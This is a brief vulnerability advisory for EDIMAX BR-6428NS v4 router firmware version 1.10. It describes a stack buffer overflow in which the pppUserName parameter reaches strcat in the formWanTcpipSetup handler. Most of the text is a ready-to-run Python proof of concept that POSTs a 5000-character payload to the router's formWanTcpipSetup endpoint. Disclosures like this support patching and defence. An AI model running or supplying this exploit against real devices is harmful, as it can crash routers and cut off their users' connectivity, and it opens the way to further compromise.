BR-6428NS_v4_1.10
The EDIMAX BR-6428NS_v4_1.10 firmware has a stack overflow vulnerability in the formWanTcpipSetup function. The v44 variable receives the pppUserName parameter from a POST request. However, since the user can control the input of pppUserName, the statement strcat() can cause a buffer overflow.

import requests
ip = "192.168.2.1"
payload = "A"*5000
data = {
"submit-url": "",
"wanMode": "2",
"enableDuallAccess": "",
"duallAccessMode": "",
"DUAL_WAN_IGMP": "",
"pppConnect": "1",
"pppDisconnect": "",
"DNSMode": "1",
"dns1": "1.1.1.1",
"dns2": "",
"pppUserName": payload,
}
url = f'http://{ip}/goform/formWanTcpipSetup'
res = requests.post(url=url, data=data, verify=False)
print(res)
